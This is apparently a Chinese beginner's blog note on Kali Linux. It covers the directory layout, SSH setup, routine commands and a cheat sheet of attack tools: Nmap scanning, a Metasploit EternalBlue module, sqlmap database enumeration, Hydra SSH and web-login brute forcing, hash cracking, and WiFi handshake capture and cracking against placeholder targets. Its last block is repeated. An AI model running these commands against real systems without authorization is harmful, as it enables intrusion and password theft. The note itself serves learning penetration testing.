Kali Linux
一款基于 Debian 的 Linux 发行版,专为网络安全测试、渗透测试、数字取证和反向工程等领域设计
默认用户名kali,密码kali

目录结构
Linux的目录结构,类似于一棵树,根节点是“/”
打开“文件系统根目录”,可查看根目录下的文件

- bin
存放命令/可执行文件 - dev
管理设备 - etc
配置文件 - lib/lib32/lib64
库文件,.so或相关后缀 - root
该目录为系统管理员,也称作超级权限者的用户主目录 - usr
这是一个非常重要的目录,用户的很多应用程序和文件都放在这个目录下
/usr/local一般通过编译源码方式安装的程序会放在此目录 - var
放着不断扩充的东西,一般将经常修改的目录放在此目录下,例如,临时目录,备份,日志文件等 - 其他
- boot:存放的是启动Linux时使用的一些核心文件,包括一些链连接文件以及镜像文件。
- media:U盘、光驱等的识别。
- mnt:让用户临时挂在别的文件系统的。
- opt:软件安装目录
- proc:这个目录是一个虚拟的目录,它是系统内存的映射,我们可以通过直接访问这个目录来获取系统信息。
- run:是一个临时文件系统,存储系统启动以来的信息。当系统重启时,这个目录下的文件应该被删掉或清除。如果你的系统上有 /var/run 目录,应该让它指向 run。
- sbin:s就是Super User的意思,这里存放的是系统管理员使用的系统管理程序。
- srv:该目录存放一些服务启动之后需要提取的数据。
- tmp:这个目录是用来存放一些临时文件的。
- sys:该目录下安装了2.6内核中新出现的一个文件系统 sysfs 。sysfs文件系统集成了下面3种文件系统的信息:针对进程信息的proc文件系统、针对设备的devfs文件系统以及针对伪终端的devpts文件系统。该文件系统是内核设备树的一个直观反映。当一个内核对象被创建的时候,对应的文件和目录也在内核对象子系统中被创建。
SSH连接
可以使用MobaXterm、XShell、SecureCRT等进行连接
首先开启kali SSH服务
sudo systemctl start ssh
然后使用XShell 8连接
常用命令
- 更新
# 更新软件源索引 sudo apt update # 更新所有已安装软件(包括系统组件和安全工具) sudo apt upgrade -y # 升级系统版本(重大更新,谨慎使用) sudo apt full-upgrade -y # 清理无用安装包 sudo apt autoremove -y && sudo apt clean - 文件与目录操作
# 列出目录内容(-l 详细信息,-a 显示隐藏文件) ls -la # 切换目录 cd /path/to/directory # 创建目录(-p 递归创建父目录) mkdir -p test/subdir # 复制文件/目录(-r 递归复制目录) cp file.txt /target/path/ cp -r dir/ /target/path/ # 移动/重命名文件 mv oldname.txt newname.txt mv file.txt /target/path/ # 删除文件(-f 强制删除,-r 递归删除目录) rm file.txt rm -rf dir/ # 查看文件内容(常用) cat file.txt # 全部内容 head -n 10 file.txt # 前10行 tail -n 10 file.txt # 后10行 tail -f log.txt # 实时监控文件更新(适合看日志) - 权限管理
# 查看文件/目录权限 ls -l file.txt # 修改权限(r=4, w=2, x=1;u=用户, g=组, o=其他) chmod 755 file.sh # 用户可读可写可执行,组和其他可读可执行 # 修改所有者(user:组) sudo chown root:root file.txt # 切换到root用户(部分工具需要root权限) sudo su - 网络配置与状态
# 查看网络接口信息(IP、MAC等) ip addr # 替代旧命令 ifconfig ifconfig # 部分系统仍支持 # 启用/禁用网络接口(如eth0、wlan0) sudo ip link set eth0 up sudo ip link set eth0 down # 测试网络连通性 ping -c 4 baidu.com # -c 4 表示发送4个包后停止 # 查看路由表 ip route # 查看端口占用情况(-t tcp, -u udp, -n 数字显示, -l 监听中) netstat -tuln ss -tuln # 更高效的替代命令 # 查看网络连接(包括进程ID) sudo netstat -tulnp - 信息收集
# Nmap 端口扫描(最核心工具之一) nmap 192.168.1.1 # 简单扫描目标IP nmap -p 1-1000 192.168.1.1 # 扫描1-1000端口 nmap -sV 192.168.1.1 # 探测端口服务版本 nmap -O 192.168.1.1 # 探测操作系统(需root) nmap -A 192.168.1.1 # 全面扫描(服务+系统+脚本) # 域名信息查询 whois example.com # 查看域名注册信息 dig example.com # DNS解析查询(A记录) dig -t mx example.com # 查看MX记录(邮件服务器) # 查看目标网站的IP和HTTP头 host example.com # 域名解析为IP curl -I example.com # 查看HTTP响应头 - Metasploit
# 启动Metasploit控制台 msfconsole # 在msfconsole内的常用命令 search eternalblue # 搜索漏洞模块(如永恒之蓝) use exploit/windows/smb/ms17_010_eternalblue # 加载漏洞模块 show options # 查看模块需要配置的参数 set RHOSTS 192.168.1.100 # 设置目标IP set LHOST 192.168.1.200 # 设置本地监听IP run # 执行漏洞利用 - Web渗透
# SQLmap(自动检测和利用SQL注入) sqlmap -u "http://example.com/index.php?id=1" # 测试目标URL sqlmap -u "http://example.com/index.php?id=1" --dbs # 列出数据库 sqlmap -u "http://example.com/index.php?id=1" -D dbname --tables # 列出表 # Burp Suite(Web渗透代理,图形化工具,命令行启动) burpsuite # 启动社区版(需在图形界面操作) # Nikto(Web服务器漏洞扫描) nikto -h http://example.com # 扫描目标网站 - 密码攻击
# Hydra(在线密码暴力破解) hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 # 破解SSH hydra -L users.txt -P pass.txt http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # 破解Web登录 # John the Ripper(哈希密码破解) john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt # 用字典破解哈希文件 john --show hash.txt # 显示已破解的密码 # Hashcat(GPU加速破解,支持多种哈希算法) hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt # -m 0 表示MD5哈希 - 无线网络
# 查看无线网卡(需支持监控模式) iwconfig # 将无线网卡切换为监控模式(如wlan0) sudo airmon-ng start wlan0 # 会生成wlan0mon接口 # 扫描附近WiFi sudo airodump-ng wlan0mon # 抓取WiFi握手包(-c 信道, --bssid 目标MAC, -w 保存文件) sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # 用握手包破解WiFi密码(-w 字典, 握手包文件) sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap - 其他
参考文章# 生成字典(crunch) crunch 8 8 0123456789 -o numeric8.txt # 生成8位纯数字字典 # 查看系统版本信息 lsb_release -a # 查找文件(在系统中搜索工具或文件) find / -name "nmap" # 查找nmap可执行文件 locate sqlmap # 快速查找(依赖数据库,需先更新:sudo updatedb) # 挂载ISO镜像(用于安装工具或查看镜像内容) sudo mount -o loop kali.iso /mnt # 查看系统版本信息 lsb_release -a # 查找文件(在系统中搜索工具或文件) find / -name "nmap" # 查找nmap可执行文件 locate sqlmap # 快速查找(依赖数据库,需先更新:sudo updatedb) # 挂载ISO镜像(用于安装工具或查看镜像内容) sudo mount -o loop kali.iso /mnt
渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)
作者:lady_killer9

3748

被折叠的 条评论
为什么被折叠?



